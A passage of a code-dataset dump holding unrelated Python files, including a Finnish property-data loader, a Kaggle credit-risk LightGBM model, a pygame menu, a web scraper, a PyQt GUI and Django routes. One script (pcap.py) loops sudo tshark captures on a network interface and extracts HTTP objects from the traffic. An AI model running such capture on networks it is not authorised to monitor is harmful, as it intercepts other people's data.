kiinteisto(url):\r\n \r\n \"\"\"reads kiinteisto data from Finnish registes\r\n \r\n args:\r\n url: the latest kiinteisto URL\r\n \r\n Exsample of url = \"https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468/download/suomi_osoitteet_2020-05-15.7z\"\r\n \r\n the data is in sevenZipfile\r\n Python py7zr library supports 7zip archive management\r\n https://pypi.org/project/py7zr/\r\n \r\n Description of kiinteistodata\r\n https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468\r\n\r\n Returns:\r\n register of kiinteisto\r\n \"\"\"\r\n import requests \r\n import os\r\n import py7zr\r\n import io\r\n import pandas as pd\r\n from supportfunctions import add_zeros\r\n import tempfile\r\n\r\n r = requests.get(url)\r\n archive = py7zr.SevenZipFile(io.BytesIO(r.content))\r\n \r\n with tempfile.TemporaryDirectory() as local_path:\r\n print('created temporary directory', local_path)\r\n archive.extractall(path=local_path)\r\n datafile = os.path.join(local_path, archive.getnames()[0] )\r\n archive.close()\r\n kiinteisto=pd.read_csv(datafile,sep=\";\", header=None, encoding=\"ISO-8859-1\", low_memory=False)\r\n kiinteisto.columns=['Rakennustunnus','Kuntanumero','Maakunta','Käyttötarkoitus',\r\n 'Pohjoiskoordinaatti','Itäkoordinaatti','Osoitenumero','Kadunnimi suomeksi',\r\n 'Kadunnimi ruotsiksi','Katunumero','Postinumero','Äänestysalue','Äänestysalueen nimi suomeksi',\r\n 'Äänestysalueen nimi ruotsiksi','Sijaintikiinteistö','Tietojen poimintapäivä']\r\n\r\n df_obj = kiinteisto.select_dtypes(['object'])\r\n kiinteisto[df_obj.columns] = df_obj.apply(lambda x: x.str.strip())\r\n\r\n kiinteisto['Postinumero'] = kiinteisto['Postinumero'].apply(add_zeros)\r\n #äänestysalue ja kuntanumero samaan alue dataan, käytetään myöhemmin\r\n kiinteisto.loc[(kiinteisto['Äänestysalue'].notna()) & (kiinteisto['Kuntanumero'].notna()), 'Alue'] = kiinteisto.loc[kiinteisto['Kuntanumero'].notna(), 'Kuntanumero'].astype(int).astype(str) + \"-\" + kiinteisto.loc[kiinteisto['Äänestysalue'].notna(), 'Äänestysalue']\r\n\r\n return(kiinteisto)\r\n\r\n\r\n\r\n\r\ndef read_kiinteisto(path, url_kiinteisto):\r\n \r\n \"\"\"This function reads all needed data\r\n either from file or calls a function to fetch data\r\n via API calls directly from sources and then writes data to files\r\n\r\n Args:\r\n path: path, where the data is stored \r\n url_kiinteisto: \r\n https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468\r\n\r\n \r\n Returns:\r\n kiinteisto: dataframe of kiinteisto\r\n\r\n \"\"\"\r\n\r\n import pandas as pd \r\n import os\r\n import inspect\r\n from supportfunctions import add_zeros\r\n\r\n #read post and muncipalities\r\n filename_kiinteisto = 'kiinteisto.csv'\r\n\r\n filename_kiinteisto = os.path.join(path, filename_kiinteisto)\r\n\r\n if os.access(filename_kiinteisto, os.R_OK):\r\n #read it from files\r\n print(inspect.stack()[0][3],' read from file')\r\n kiinteisto_data = pd.read_csv(filename_kiinteisto, encoding=\"ISO-8859-1\", low_memory=False)\r\n kiinteisto_data.loc[:,'Postinumero'] = kiinteisto_data['Postinumero'].apply(add_zeros)\r\n\r\n else:\r\n #read kiinteistodata\r\n print(inspect.stack()[0][3],' read from API')\r\n kiinteisto_data = kiinteisto(url_kiinteisto)\r\n kiinteisto_data.to_csv(filename_kiinteisto, index=False, encoding=\"ISO-8859-1\")\r\n return(kiinteisto_data)\r\n\r\n","repo_name":"launis/areadata","sub_path":"read_kiinteisto.py","file_name":"read_kiinteisto.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13973975615","text":"import os\nfrom scapy.all import *\nimport time\nimport subprocess\n\ndef run_bash(bashCommand):\n process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n process.wait()\n output, error = process.communicate()\n return output\n\ndef run_export_objects():\n process = subprocess.Popen([\"sudo\", \"tshark\", \"-r\", pcap_name, \"--export-object\", 'http,./output/'], stdout=subprocess.PIPE)\n process.wait()\n output, error = process.communicate()\n return output\n\nwhile True:\n pcap_name = str(time.time())+\".pcap\"\n\n print(\"pcap_name:\", pcap_name)\n\n print(\"Starting capture...\")\n\n run_bash(\"touch \"+pcap_name)\n run_bash(\"chmod 777 \"+pcap_name)\n run_bash(\"sudo tshark -i ens33 -w \"+ pcap_name + \" -c 500\")\n\n print(\"Ended capture...\")\n\n run_bash(\"sudo tshark -r \" +pcap_name+ \" --export-object http,./output/\")\n\n run_bash(\"ls output\")\n\n \n\n\n\n","repo_name":"Fishbiscuit/div0","sub_path":"pcap.py","file_name":"pcap.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19024630848","text":"from math import *\nimport os\nos.system(\"cls\")\nmy_num= 5\nyour_num= -10\nprint(abs(your_num)) # to get the absolute value of any num.\nprint(max(my_num, your_num,6,10,192,192,1,232,34)) # to get the largest one of them.\nprint(round(3.4)) # to get the roundfigure.\nprint(floor(5.12345)) # in math function and use to get only the without decimal value.\nprint(ceil(3.1)) # in math function and use to get a number up.\na= float(input(\"Enter a number:- \"))\nb= float(input(\"Enter another number:- \"))\nresult= a+b\nprint(result)\nfriends=[\"Abhay\", \"Jatin\", \"Jaismine\", \"Jainy\"]\nnumbers=[10,20]\nfriends.extend(numbers)\nprint(friends)","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new8.py","file_name":"new8.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42156045864","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport numpy as np\nimport os\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder\nfrom sklearn.metrics import accuracy_score, roc_auc_score, confusion_matrix\nfrom sklearn.feature_selection import VarianceThreshold\nimport lightgbm as lgb\nimport seaborn as sns\n\nPATH = os.getenv('HOME')+'/.kaggle/competitions/home-credit-default-risk/'\n#PATH = \"/Users/Ojasvi/.kaggle/competitions/home-credit-default-risk/\"\n\nprint(\"Importing data...\")\ndataframe = pd.read_csv(PATH + \"application_train.csv\")\ntest = pd.read_csv(PATH + 'application_test.csv')\nprev = pd.read_csv(PATH + 'previous_application.csv')\nbureau = pd.read_csv(PATH + 'bureau.csv')\nbureau_balance = pd.read_csv(PATH + 'bureau_balance.csv')\ncredit_card = pd.read_csv(PATH + 'credit_card_balance.csv')\nPOS_CASH = pd.read_csv(PATH + 'POS_CASH_balance.csv')\npayments = pd.read_csv(PATH + 'installments_payments.csv')\nlgbm_sub = pd.read_csv(PATH + 'sample_submission.csv')\n\nprint('The shape of our features is:', dataframe.shape)\n\n# Dropping rows with NaN values\n# IMPUTATION HERE PLS\n#dataframe.dropna(inplace=True)\n\n# seperate target variable\nlabels = np.array(dataframe['TARGET'])\ndataframe = dataframe.drop('TARGET', axis = 1)\nfeature_list = list(dataframe.columns)\n\n# One Hot Encoding - converts categorical data in training into numerical\ncat_features = [col for col in dataframe.columns if dataframe[col].dtype == 'object']\n\n# concatenate training and test and do one hot encoding\none_hot = pd.concat([dataframe, test])\none_hot = pd.get_dummies(one_hot, columns=cat_features)\n\n# seperate back to training and test sets after one hot encoding\ndataframe = one_hot.iloc[:dataframe.shape[0],:] \ntest = one_hot.iloc[dataframe.shape[0]:,] \n\nprint('The shape of our features is:', dataframe.shape)\n\n#Pre-processing bureau_balance\nprint('Pre-processing bureau_balance...')\nbureau_grouped_size = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].size()\nbureau_grouped_max = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].max()\nbureau_grouped_min = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].min()\n\nbureau_counts = bureau_balance.groupby('SK_ID_BUREAU')['STATUS'].value_counts(normalize = False)\nbureau_counts_unstacked = bureau_counts.unstack('STATUS')\nbureau_counts_unstacked.columns = ['STATUS_0', 'STATUS_1','STATUS_2','STATUS_3','STATUS_4','STATUS_5','STATUS_C','STATUS_X',]\nbureau_counts_unstacked['MONTHS_COUNT'] = bureau_grouped_size\nbureau_counts_unstacked['MONTHS_MIN'] = bureau_grouped_min\nbureau_counts_unstacked['MONTHS_MAX'] = bureau_grouped_max\n\nbureau = bureau.join(bureau_counts_unstacked, how='left', on='SK_ID_BUREAU')\n\n#Pre-processing previous_application\nprint('Pre-processing previous_application...')\n#One-hot encoding of categorical features in previous application data set\nprev_cat_features = [pcol for pcol in prev.columns if prev[pcol].dtype == 'object']\nprev = pd.get_dummies(prev, columns=prev_cat_features)\navg_prev = prev.groupby('SK_ID_CURR').mean()\ncnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()\navg_prev['nb_app'] = cnt_prev['SK_ID_PREV']\ndel avg_prev['SK_ID_PREV']\n\n#Pre-processing bureau\nprint('Pre-processing bureau...')\n#One-hot encoding of categorical features in bureau data set\nbureau_cat_features = [bcol for bcol in bureau.columns if bureau[bcol].dtype == 'object']\nbureau = pd.get_dummies(bureau, columns=bureau_cat_features)\navg_bureau = bureau.groupby('SK_ID_CURR').mean()\navg_bureau['bureau_count'] = bureau[['SK_ID_BUREAU', 'SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']\ndel avg_bureau['SK_ID_BUREAU']\n\n#Pre-processing POS_CASH\nprint('Pre-processing POS_CASH...')\nle = LabelEncoder()\nPOS_CASH['NAME_CONTRACT_STATUS'] = le.fit_transform(POS_CASH['NAME_CONTRACT_STATUS'].astype(str))\nnunique_status = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()\nnunique_status2 = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()\nPOS_CASH['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']\nPOS_CASH['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']\nPOS_CASH.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)\n\n#Pre-processing credit_card\nprint('Pre-processing credit_card...')\ncredit_card['NAME_CONTRACT_STATUS'] = le.fit_transform(credit_card['NAME_CONTRACT_STATUS'].astype(str))\nnunique_status = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()\nnunique_status2 = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()\ncredit_card['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']\ncredit_card['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']\ncredit_card.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)\n\n#Pre-processing payments\nprint('Pre-processing payments...')\navg_payments = payments.groupby('SK_ID_CURR').mean()\navg_payments2 = payments.groupby('SK_ID_CURR').max()\navg_payments3 = payments.groupby('SK_ID_CURR').min()\ndel avg_payments['SK_ID_PREV']\n\n#Join data bases\nprint('Joining databases...')\ndataframe= dataframe.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_bureau.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_bureau.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')\n\n#Remove features with many missing values\nprint('Removing features with more than 80% missing...')\ntest = test[test.columns[dataframe.isnull().mean() < 0.85]]\ndataframe= dataframe[dataframe.columns[dataframe.isnull().mean() < 0.85]]\n\n#Delete customer Id\ndel dataframe['SK_ID_CURR']\ndel test['SK_ID_CURR']\n\n#Create train and validation set\ntrain_x, valid_x, train_y, valid_y = train_test_split(dataframe, labels, test_size=0.2, shuffle=True)\n\n#------------------------Build LightGBM Model-----------------------\ntrain_data=lgb.Dataset(train_x,label=train_y)\nvalid_data=lgb.Dataset(valid_x,label=valid_y)\n\n#Select Hyper-Parameters\nparams = {'boosting_type': 'gbdt',\n 'max_depth' : 10,\n 'objective': 'binary',\n 'nthread': 5,\n 'num_leaves': 64,\n 'learning_rate': 0.05,\n 'max_bin': 512,\n 'subsample_for_bin': 200,\n 'subsample': 1,\n 'subsample_freq': 1,\n 'colsample_bytree': 0.8,\n 'reg_alpha': 5,\n 'reg_lambda': 10,\n 'min_split_gain': 0.5,\n 'min_child_weight': 1,\n 'min_child_samples': 5,\n 'scale_pos_weight': 1,\n 'num_class' : 1,\n 'metric' : 'auc'\n }\n\n#Train model on selected parameters and number of iterations\nlgbm = lgb.train(params,\n train_data,\n 2500,\n valid_sets=valid_data,\n early_stopping_rounds= 40,\n verbose_eval= 10\n )\n\n#Predict on test set and write to submit\npredictions_lgbm_prob = lgbm.predict(test)\n\nlgbm_sub.TARGET = predictions_lgbm_prob\n\nlgbm_sub.to_csv('lgbm_submission.csv', index=False)\n\n#Plot Variable Importances\nlgb.plot_importance(lgbm, max_num_features=21, importance_type='split')\nplt.show()\n","repo_name":"ainharan/COMP9417-Project","sub_path":"lgbm.py","file_name":"lgbm.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15114804726","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport pygame\n\n\nclass GameMenu:\n # Define the initalize self options\n def __init__(self, start=0, *options):\n self.options = options\n self.x = 0\n self.y = 0\n self.font = pygame.font.Font(None, 32)\n self.option = start\n self.width = 1\n self.color = [0, 0, 0]\n self.hcolor = [0, 0, 0]\n self.height = len(options) * self.font.get_height()\n for o in options:\n text = o[0]\n ren = self.font.render(text, 1, (0, 0, 0))\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n\n # Draw the menu\n def draw(self, surface):\n i = 0\n for o in self.options:\n if i == self.option:\n clr = self.hcolor\n else:\n clr = self.color\n text = o[0]\n ren = self.font.render(text, 1, clr)\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n surface.blit(ren, (self.x, self.y + i * self.font.get_height()))\n i += 1\n\n # Handle events\n def update(self, events):\n for e in events:\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_UP:\n self.option -= 1\n elif e.key == pygame.K_DOWN:\n self.option += 1\n elif e.key == pygame.K_RETURN:\n self.options[self.option][1]()\n if self.option > len(self.options) - 1:\n self.option = 0\n elif self.option < 0:\n self.option = len(self.options) - 1\n\n # Position of menu\n def set_pos(self, x, y):\n self.x = x\n self.y = y\n\n # Font Style\n def set_font(self, font):\n self.font = font\n for o in self.options:\n text = o[0]\n ren = self.font.render(text, 1, (0, 0, 0))\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n\n # Highlight Color\n def set_highlight_color(self, color):\n self.hcolor = color\n\n # Font Color\n def set_normal_color(self, color):\n self.color = color\n\n # Font position\n def center_at(self, x, y):\n self.x = x - (self.width / 2)\n self.y = y - (self.height / 2)\n","repo_name":"wangzhenyu1260/gobang","sub_path":"gameMenu.py","file_name":"gameMenu.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15251410996","text":"import scrapy\nimport pandas as pd\nimport requests\nfrom scrapy.crawler import CrawlerProcess\nfrom bs4 import BeautifulSoup\nfrom os.path import exists\n\nall_data = pd.DataFrame(dict())\n\nclass Spider(scrapy.Spider):\n name = \"freecodecamp\"\n\n def start_requests(self):\n file_link = exists('freecodecamp_links.csv')\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0'}\n if file_link:\n\n d = pd.read_csv('freecodecamp_links.csv')\n urls = list(d.loc[:,'links'])\n else:\n re = requests.get('https://www.freecodecamp.org/news/sitemap-posts.xml')\n s = BeautifulSoup(re.content, ['xml'])\n links = s.find_all('loc')\n\n urls = [l.text for l in links if\n l.text.startswith('https://www.freecodecamp.org/news/') and 'images' not in l.text]\n links = pd.DataFrame(urls, columns=['links'])\n links.to_csv('freecodecamp_links.csv')\n\n print('scrapped all links and save it in freecodecamp_links.csv')\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse,headers=headers)\n\n def parse(self, response):\n global all_data\n data = dict()\n # getting title\n\n data['title'] = response.css('h1.post-full-title::text').extract_first()\n\n data['date'] = response.css('time.post-full-meta-date::text').extract_first().strip()\n\n tag = response.css('section.post-full-meta a::text').extract_first()\n if tag:\n data['tag'] = tag.strip()\n\n author = response.css('span.author-card-name a::text').extract_first()\n if author:\n data['author'] = author.strip()\n\n data['author_profile_link'] = 'https://www.freecodecamp.org' + response.css('span.author-card-name a::attr(href)').extract_first()\n\n data['author_Bio'] = response.css('section.author-card-content p::text').extract_first()\n\n data['post_image_link'] = response.css('figure.post-full-image img::attr(src)').extract_first()\n\n\n data['post-content'] = str(response.css('section.post-content *::text').extract())\n\n data = pd.DataFrame(data, index=[0])\n all_data = pd.concat([all_data, data], ignore_index=True)\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n\n process.crawl(Spider)\n\n process.start()\n all_data.to_csv('freecodecamp_course_data.csv')\n print(\"freecodecamp_course_data.csv is stored\")\n","repo_name":"Deepraj-chawda/E-learning-web-scrapers-","sub_path":"freecodecamp/freecodecamp.py","file_name":"freecodecamp.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43990367520","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QVBoxLayout, QLabel, QLineEdit, QMessageBox, QHBoxLayout, QComboBox, QCheckBox\r\nfrom PyQt5 import QtGui\r\nfrom Calcul_conso_elec import Prediction\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom catboost import CatBoostRegressor\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport catboost\r\nimport datetime\r\n\r\nclass Fenetre(QWidget):\r\n def __init__(self):\r\n QWidget.__init__(self)\r\n self.setUI()\r\n def setUI(self):\r\n \r\n # création du champ de texte\r\n self.ChampDiam = QLineEdit('90' ) #order : Diameter, thickness, steel_type, weight, length, numbers, month\r\n self.ChampThick = QLineEdit('1.4')\r\n self.ChampSteel = QLineEdit('K60')\r\n self.ChampWeight = QLineEdit('0.06')\r\n self.ChampLen = QLineEdit('12')\r\n self.ChampNum = QLineEdit('1')\r\n self.ChampMonth = QLineEdit('1')\r\n\r\n # Création des boutons\r\n self.BoutonSubmit = QPushButton(\"Submit\")\r\n self.BoutonExit = QPushButton(\"Quit\")\r\n \r\n # on connecte pour le bouton Submit le \"clique\" à la méthode \"CalculPrediction\"\r\n # et le bouton \"Exit\" est connecte à la méthode .exit\r\n self.BoutonSubmit.clicked.connect(self.CalculPrediction)\r\n self.BoutonExit.clicked.connect(app.exit)\r\n \r\n # Création des nom des champ de saisie via des label\r\n # Création des nom des champ de saisie via des label\r\n Lmin=['86', '1.2', '0.01', '9.5', '0']\r\n Lmax=['245', '8', '0.15', '12.5', '16']\r\n self.welcome = QLabel('This program gives an idea of the consumption of the plant.\\nUse these results with a critical look.\\nThe min/max values are indicative, the predictions should be accurate in this range.\\nYou can put whatever values you want, even negative, even if it should not be possible.\\n')\r\n self.LabelDiam = QLabel(\"Diameter (cm), min : \" + Lmin[0] + \" | max : \" + Lmax[0])\r\n self.LabelThick = QLabel(\"Thickness (cm), min : \" + Lmin[1] + \" | max : \" + Lmax[1])\r\n self.LabelSteel = QLabel(\"Steel type\")\r\n self.combo = QComboBox(self)\r\n self.comboMonth = QComboBox(self)\r\n self.LabelWeight = QLabel(\"Weight (tons), min : \" + Lmin[2] + \" | max : \" + Lmax[2])\r\n self.LabelLen = QLabel(\"Length (m), min : \" + Lmin[3] + \" | max : \" + Lmax[3])\r\n self.LabelNum = QLabel(\"Numbers, min : \" + Lmin[4] + \" | max : \" + Lmax[4])\r\n self.LabelMonth = QLabel(\"Month\")\r\n self.cb = QCheckBox(\"Export predictions to a CSV file ? (predictions.csv is saved in the program folder)\")\r\n self.credits = QLabel(\"Program made by Clément Seguin, Michaël Soissons, Henri Prevost and Alexis Mourlon for the exclusive use of Chelpipe Group.\")\r\n\r\n Lsteel = ['17Г1С-У', 'DNV SAWL 485 FD', 'X70ME', 'K52', 'K60', 'K65']\r\n Lmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'June', 'July', 'Aug', 'Sept', 'Oct', 'Nov', 'Dec']\r\n\r\n for steel in Lsteel:\r\n self.combo.addItem(steel)\r\n\r\n for month in Lmonths:\r\n self.comboMonth.addItem(month)\r\n\r\n # Mise en forme des widgets (alignement horizontal = QVBoxLayout, alignement horizontal = QHBoxLayout)\r\n layout = QVBoxLayout()\r\n hbox = QHBoxLayout()\r\n\r\n layout.addWidget(self.welcome)\r\n\r\n layout.addWidget(self.LabelDiam)\r\n layout.addWidget(self.ChampDiam)\r\n\r\n layout.addWidget(self.LabelThick)\r\n layout.addWidget(self.ChampThick)\r\n\r\n layout.addWidget(self.LabelSteel)\r\n layout.addWidget(self.combo)\r\n\r\n layout.addWidget(self.LabelWeight)\r\n layout.addWidget(self.ChampWeight)\r\n\r\n layout.addWidget(self.LabelLen)\r\n layout.addWidget(self.ChampLen)\r\n\r\n layout.addWidget(self.LabelNum)\r\n layout.addWidget(self.ChampNum)\r\n\r\n layout.addWidget(self.LabelMonth)\r\n layout.addWidget(self.comboMonth)\r\n\r\n layout.addWidget(self.cb)\r\n\r\n hbox.addWidget(self.BoutonExit)\r\n\r\n hbox.addStretch(1)\r\n\r\n hbox.addWidget(self.BoutonSubmit)\r\n\r\n layout.addWidget(self.credits)\r\n\r\n layout.addStretch(1)\r\n layout.addLayout(hbox)\r\n\r\n self.setLayout(layout)\r\n self.setWindowTitle('Chelpipe Group - Electrical Consumption Forecaster - Release 1.0 - August 2019')\r\n\r\n def MessageError(self):\r\n message = QMessageBox()\r\n message.setText(\"Invalid value entered\")\r\n message.setInformativeText(\"Please enter a value with the correct type expected\")\r\n message.setWindowTitle(\"Alert message\")\r\n message.setStandardButtons(QMessageBox.Ok)\r\n message.exec()\r\n \r\n def CalculPrediction(self):\r\n # Zone de récup des var de saisies\r\n self.ValDiam = self.ChampDiam.text()\r\n self.ValThick = self.ChampThick.text()\r\n self.ValSteel = self.combo.currentText()\r\n self.ValWeight = self.ChampWeight.text()\r\n self.ValLen = self.ChampLen.text()\r\n self.ValNum = self.ChampNum.text()\r\n self.ValMonth = self.comboMonth.currentIndex() + 1\r\n\r\n # Test de verification des var de saisies\r\n try:\r\n self.ValDiam = float(self.ValDiam)\r\n except:\r\n self.MessageError()\r\n self.ValDiam = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValThick = float(self.ValThick)\r\n except:\r\n self.MessageError()\r\n self.ValThick = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValSteel = str(self.ValSteel)\r\n except:\r\n self.MessageError()\r\n self.ValSteel = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValWeight = float(self.ValWeight)\r\n except:\r\n self.MessageError()\r\n self.ValWeight = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValLen = float(self.ValLen)\r\n except:\r\n self.MessageError()\r\n self.ValLen = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValNum = float(self.ValNum)\r\n except:\r\n self.MessageError()\r\n self.ValNum = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n try:\r\n self.ValMonth = float(self.ValMonth)\r\n except:\r\n self.MessageError()\r\n self.ValMonth = \"LOLO <3\"\r\n return app.exec_()\r\n\r\n # Appel de la class calcul\r\n ElecConsoInput = Prediction.DD(self, self.ValDiam, self.ValThick, self.ValSteel, self.ValWeight, self.ValLen, self.ValNum, self.ValMonth)\r\n\r\n# Création de la fenetre et de l'app\r\napp = QApplication.instance()\r\nif not app:\r\n app = QApplication(sys.argv)\r\n\r\nfen = Fenetre()\r\nfen.show()\r\nfen.setGeometry(300, 300, 570, 250)\r\nfen.setWindowIcon(QtGui.QIcon(\"89001_big.ico\"))\r\napp.exec_()","repo_name":"magicien3ouf/FECCG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33560895885","text":"'''\nGiven an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\nYou must write an algorithm that runs in O(n) time.\n\n \n\nExample 1:\n\nInput: nums = [100,4,200,1,3,2]\nOutput: 4\nExplanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.\nExample 2:\n\nInput: nums = [0,3,7,2,5,8,4,6,0,1]\nOutput: 9\n'''\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n nums.sort()\n longest, currLongest = 0, min(1,len(nums))\n for i in range(1,len(nums)):\n if(nums[i] == nums[i-1]):\n continue\n if(nums[i] == nums[i-1]+1):\n currLongest+=1\n else:\n longest, currLongest = max(longest, currLongest), 1\n return max(longest, currLongest)\n","repo_name":"sksuraj17/Leetcode-python-programs","sub_path":"Longest Consecutive Sequence.py","file_name":"Longest Consecutive Sequence.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12134039875","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom web.views import *\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport api.urls\nfrom api.views import *\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('apis/profession/', include([\n path('', ProfessionList.as_view()),\n path('/', DetailProfession.as_view()),\n ])),\n path('apis/orders/', include([\n path('', OrdersList.as_view()),\n path('/', DetailOrder.as_view()),\n ])),\n path('apis/profiles/', include([\n path('', ProfileList.as_view()),\n path('/', DetailProfile.as_view()),\n ])),\n path('apis/feedbacks/', include([\n path('', FeedbackList.as_view()),\n path('/', DetailFeedback.as_view()),\n ])),\n path('apis/completedorder/', include([\n path('', CompletedOrderList.as_view()),\n path('/', DetailCompletedOrder.as_view()),\n ])),\n\n path('orders/', orders, name=\"order_list\"),\n path('orders//', order_detail, name='order_detail'),\n path('orders//responses//', response_status, name='response_status'),\n path('', index, name = \"index\"),\n path('accounts/', include('django.contrib.auth.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"KarinaInTrouble/apartx.app","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39878105445","text":"from .. import api_threads\nfrom .. import utils\nfrom pprint import pprint\n\nimport sublime\nimport sublime_plugin\n\n\nclass SubmitProblemCommand(sublime_plugin.TextCommand):\n def run(self, edit, finalize=False):\n code = self.view.substr(sublime.Region(0, self.view.size()))\n pprint(code)\n\n settings = utils.get_settings()\n api_key = settings.get('api_key')\n self.finalize = finalize\n self.session_thread = api_threads.SubmitKataThread(api_key, utils.get_database_file(), code,\n finalize)\n self.session_thread.start()\n sublime.set_timeout(lambda: self.handle_threads())\n\n def handle_threads(self):\n if not self.session_thread.isAlive() and self.session_thread.result is None:\n return\n\n if self.session_thread.result is None:\n 